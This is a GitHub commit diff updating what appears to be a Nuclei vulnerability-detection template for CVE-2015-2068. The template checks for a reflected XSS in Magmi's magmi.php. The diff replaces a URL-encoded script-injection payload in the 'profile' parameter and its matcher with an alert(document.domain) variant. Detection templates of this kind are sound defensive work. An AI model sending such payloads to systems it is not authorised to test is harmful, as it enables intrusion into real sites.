Update CVE-2015-2068.yaml

patch-1
Prince Chaddha 2021-10-11 17:32:29 +05:30 committed by GitHub
parent 13fe132913
commit dace44b3af
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 2 deletions

View File

@ -13,13 +13,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E'
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert('XSS');</script>"
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words: